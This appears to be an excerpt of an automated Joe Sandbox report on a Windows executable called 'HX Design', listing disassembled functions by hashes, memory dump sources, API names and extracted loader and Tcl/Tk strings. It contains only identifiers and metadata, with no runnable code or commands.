                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                                      • Instruction ID: f6064a34e888272e87fa1d5996f7d65e687b994f4ba33a9bc8c44acbd206fb49
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2581F172A0938156EBB4EF1DA48037AAA91FB457D4F904235DB8D43B99DF7CE008DB50
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                                                                                                                                                                      • Instruction ID: 868fa243172c45ec23a33c20b1b7242afd832503e38f56ef4c0ed5cdb98202cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5610822E0829666F764AA68945063FE6C0EF50770FD60239D71D47AD5DEFDE808E720
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                      • Instruction ID: 51a7d2051df7089d72c9e5e1d3d6f6d26125544614690604802e0a5dc62716b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6451A436A1865196E724AF2DC040278F7A0EB44F68F644131CE8D177D4DBBAEC4BE7A0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                      • Instruction ID: 2ae800ae71c65ae086046ae7dcf51101f4fed2b7bb3170807e4b0465e3882459
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F951C436A18651AAE724BB2DC440238B3A1FB64F68F644135CE4C07794CFBAEC57E760
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                      • Instruction ID: 741ebe5ca5d4adeecd3ee0b768507267f9cc369b6550629756310ff983f1a8c2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2051C376A18A5192E724AB2DD040338F3A0EB45F68F644131CE8D077D4DBBAEC57DB50
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                      • Instruction ID: 0f98639aca6c7ab6e157aeffeb74986bfcc54573389794c3decdce85531bf8a6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2351AF76A1865196E724AF2DC040238E7B1EB45F58FA44131CE4C177D4DBBAEC4AE7A0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                      • Instruction ID: 62b514e199dff4de0d4ecce76e656f1f9e09b843b03b786435151ffd0beacfde
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D518F76A1865196E764AB2DC04023CE7B1EB45F58FA44131CE4C17BD4CFBAE847E790
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                      • Instruction ID: 5b20b8a00e9d9958e357b0f32b63b0768d4c7fc0b6912fc6b067a955fba02076
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B151A336B1865599E724AB2DC044338B7A0EB44F58FA44131CE4C177E9CBBAE847E7A0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                      • Instruction ID: cee439886fb64e256b382b5e22d93946b9280dd6cf42b629edd93405d5d68e67
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F41B56280D78A15E9B9B99C05086F8AE809F127A0DD852B4DDAD173D3DD4D698EE130
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                                      • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                                      • Instruction ID: 4074a9f1b9beed3ac8ea7f3aaad549a410162d54a9d6a70f06e9c2921df0959f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A412132714A4482EF04EF2AD914579A3A1FB88FC0B889037EE0D97B68EE7DC446D300
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                      • Instruction ID: 749dbedda7f253a8327bfc5ae8ec5e8d75cef7b44423f37e187cca76816f3b84
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3631B632B09B4151E754BF29A48013EEAD9AF84BD0F944238EA4D53BD5DF7CD016E714
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                                      • Instruction ID: 0059e3c71f0fc67123dfa2a23cee270d0446143cdfe2b665034f2386f08e6e3a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF068727182959BDBD89F69A442629B7D0F7483C0FC09039D58D83B04DA7CD055DF24
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                                      • Instruction ID: 89fd4544a2d122a5544f3237706d75d4f966f964c44629fae0c4a0e20f699198
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AA00231E0CC1AF0E644AB01E8E0036A330FB65310BC40031E02DA10B09FBCA50CF325
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                      • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                      • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                      • Instruction ID: f5d0253a2f235e63eca7eff849e115442d0b3fb2dbded6db7d7acb36cff9dba5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B402C124A09B07B1FA54BB64B8509B6A3A1FF04B54FD41235D83E422A0EFBCB54DF634
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9
                                                                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7320686B7,?,?,00000000,00007FF732063CBB), ref: 00007FF73206822C
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062810: MessageBoxW.USER32 ref: 00007FF7320628EA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                      • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                      • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                      • Instruction ID: 964905228b4dafa14bf1a6c678240bb15110a8afe0d74907b583647b33bf960f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B51A611B19643A1FA50BB25E8956BAE3A0EF84780FC44431D60E826D5FEFCE40CE324
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                      • String ID: P%
                                                                                                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
